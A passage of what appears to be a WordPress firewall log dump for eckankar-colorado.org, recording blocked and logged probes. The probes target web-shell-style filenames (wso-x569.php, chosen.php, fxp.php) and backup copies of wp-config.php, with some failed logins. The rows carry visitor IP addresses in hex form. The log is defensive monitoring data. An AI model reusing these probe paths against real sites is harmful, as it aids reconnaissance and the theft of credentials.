User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3VwbG9hZHMv\",\"category\":\"brute-force\",\"ssl\":1}'),(133389,1699888622.575560,1699888622.560700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-wp-application-passwords-list-table.php','http://eckankar-colorado.org/wp-admin/includes/class-wp-application-passwords-list-table.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdwLWFwcGxpY2F0aW9uLXBhc3N3b3Jkcy1saXN0LXRhYmxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133382,1699888624.950087,1699888624.940500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-wp-filesystem-ftpext.php','http://eckankar-colorado.org/wp-admin/includes/class-wp-filesystem-ftpext.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdwLWZpbGVzeXN0ZW0tZnRwZXh0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133381,1699888625.280833,1699888625.271800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-wp-filesystem-ftpsockets.php','http://eckankar-colorado.org/wp-admin/includes/class-wp-filesystem-ftpsockets.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdwLWZpbGVzeXN0ZW0tZnRwc29ja2V0cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133419,1699888610.901367,1699888610.885900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wordpress/wp-includes/','http://eckankar-colorado.org/wordpress/wp-includes/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dvcmRwcmVzcy93cC1pbmNsdWRlcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133390,1699888622.239033,1699888622.229800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-wp-ajax-upgrader-skin.php','http://eckankar-colorado.org/wp-admin/includes/class-wp-ajax-upgrader-skin.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdwLWFqYXgtdXBncmFkZXItc2tpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133391,1699888621.906819,1699888621.884600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-walker-nav-menu-edit.php','http://eckankar-colorado.org/wp-admin/includes/class-walker-nav-menu-edit.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdhbGtlci1uYXYtbWVudS1lZGl0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133418,1699888611.242145,1699888611.233600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/blog/wp-includes/','http://eckankar-colorado.org/blog/wp-includes/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Jsb2cvd3AtaW5jbHVkZXMv\",\"category\":\"brute-force\",\"ssl\":1}'),(133392,1699888621.560858,1699888621.551600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-walker-nav-menu-checklist.php','http://eckankar-colorado.org/wp-admin/includes/class-walker-nav-menu-checklist.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdhbGtlci1uYXYtbWVudS1jaGVja2xpc3QucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133066,1699787356.636980,1699787356.615300,0x00000000000000000000FFFFC2A9AF1F,0,403,0,0,0,'https://eckankar-colorado.org/wso-x569.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dzby14NTY5LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133079,1699788222.891736,1699788222.888200,0x00000000000000000000FFFF92BE7918,0,200,0,0,0,'https://eckankar-colorado.org/wp-config.php.sav',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0','logged:waf','wp-config.php back-up probing','{\"learningMode\":0,\"failedRules\":\"logged|501\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbmZpZy5waHAuc2F2\",\"path\":\"L3dwLWNvbmZpZy5waHAuc2F2\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(133069,1699788205.886060,1699788205.882500,0x00000000000000000000FFFF92BE7918,0,200,0,0,0,'https://eckankar-colorado.org/wp-config.txt',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0','logged:waf','wp-config.php back-up probing','{\"learningMode\":0,\"failedRules\":\"logged|501\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbmZpZy50eHQ=\",\"path\":\"L3dwLWNvbmZpZy50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(133088,1699799833.854020,1699799833.845300,0x00000000000000000000FFFF5B5CFE59,0,403,0,0,0,'https://eckankar-colorado.org/chosen.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Nob3Nlbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133070,1699788205.546363,1699788205.542800,0x00000000000000000000FFFF92BE7918,0,200,0,0,0,'https://eckankar-colorado.org/wp-config.php.txt',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0','logged:waf','wp-config.php back-up probing','{\"learningMode\":0,\"failedRules\":\"logged|501\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbmZpZy5waHAudHh0\",\"path\":\"L3dwLWNvbmZpZy5waHAudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(133090,1699799876.079384,1699799876.070500,0x00000000000000000000FFFF5B5CFE59,0,403,0,0,0,'https://eckankar-colorado.org/wp-head.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWhlYWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133068,1699788202.223878,1699788202.220200,0x00000000000000000000FFFF92BE7918,0,200,0,0,0,'https://eckankar-colorado.org/wp-config.php~',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0','logged:waf','wp-config.php back-up probing','{\"learningMode\":0,\"failedRules\":\"logged|501\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbmZpZy5waHB+\",\"path\":\"L3dwLWNvbmZpZy5waHB+\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(133086,0.000000,1699799143.429935,0x00000000000000000000FFFF14C1E801,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(133087,1699799861.065115,1699799861.043300,0x00000000000000000000FFFF5B5CFE59,0,403,0,0,0,'https://eckankar-colorado.org/wp-head.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWhlYWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133071,1699788205.184782,1699788205.181000,0x00000000000000000000FFFF92BE7918,0,200,0,0,0,'https://eckankar-colorado.org/wp-config.php.old',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0','logged:waf','wp-config.php back-up probing','{\"learningMode\":0,\"failedRules\":\"logged|501\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbmZpZy5waHAub2xk\",\"path\":\"L3dwLWNvbmZpZy5waHAub2xk\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(133067,0.000000,1699787465.882693,0x00000000000000000000FFFF14C1E801,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(133609,1699888536.373112,1699888536.364500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/global-styles-and-settings.php','http://eckankar-colorado.org/wp-includes/global-styles-and-settings.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2dsb2JhbC1zdHlsZXMtYW5kLXNldHRpbmdzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133610,1699888536.033026,1699888536.024400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/general-template.php','http://eckankar-colorado.org/wp-includes/general-template.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2dlbmVyYWwtdGVtcGxhdGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133611,1699888535.687884,1699888535.679200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/functions.wp-styles.php','http://eckankar-colorado.org/wp-includes/functions.wp-styles.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Z1bmN0aW9ucy53cC1zdHlsZXMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133061,1699787369.924319,1699787369.913200,0x00000000000000000000FFFFC2A9AF1F,0,403,0,0,0,'https://eckankar-colorado.org/users.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3VzZXJzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133062,1699787367.710439,1699787367.696500,0x00000000000000000000FFFFC2A9AF1F,0,403,0,0,0,'https://eckankar-colorado.org/classwithtostring.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NsYXNzd2l0aHRvc3RyaW5nLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133073,1699788203.992676,1699788203.989100,0x00000000000000000000FFFF92BE7918,0,200,0,0,0,'https://eckankar-colorado.org/wp-config.php.dist',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0','logged:waf','wp-config.php back-up probing','{\"learningMode\":0,\"failedRules\":\"logged|501\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbmZpZy5waHAuZGlzdA==\",\"path\":\"L3dwLWNvbmZpZy5waHAuZGlzdA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(133063,1699787364.663979,1699787364.135700,0x00000000000000000000FFFFC2A9AF1F,0,403,0,0,0,'https://eckankar-colorado.org/themes.php/wp-includes/css/dist/editor/fxp.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3RoZW1lcy5waHAvd3AtaW5jbHVkZXMvY3NzL2Rpc3QvZWRpdG9yL2Z4cC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133091,1699799916.147145,1699799916.125200,0x00000000000000000000FFFF5B5CFE59,0,403,0,0,0,'https://eckankar-colorado.org/.well-known/index.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly53ZWxsLWtub3duL2luZGV4LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133097,1699815377.028073,1699815377.006200,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://www.eckankar-colorado.org/wp-includes/widgets/include.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvaW5jbHVkZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133092,1699799901.886357,1699799901.877500,0x00000000000000000000FFFF5B5CFE59,0,403,0,0,0,'https://eckankar-colorado.org/406.shtml','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzQwNi5zaHRtbA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133309,1699888650.323574,1699888650.308100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/admin/controller/extension/extension/','http://eckankar-colorado.org/admin/controller/extension/extension/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134735,1700223274.676599,1700223274.641800,0x00000000000000000000FFFF5B867E5B,0,403,0,0,0,'https://eckankar-colorado.org/chosen.php?p=','eckankar-colorado.org','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) colonel Chrome/196.3.1597.530 Safari/537.36','blocked:waf','Known malicious 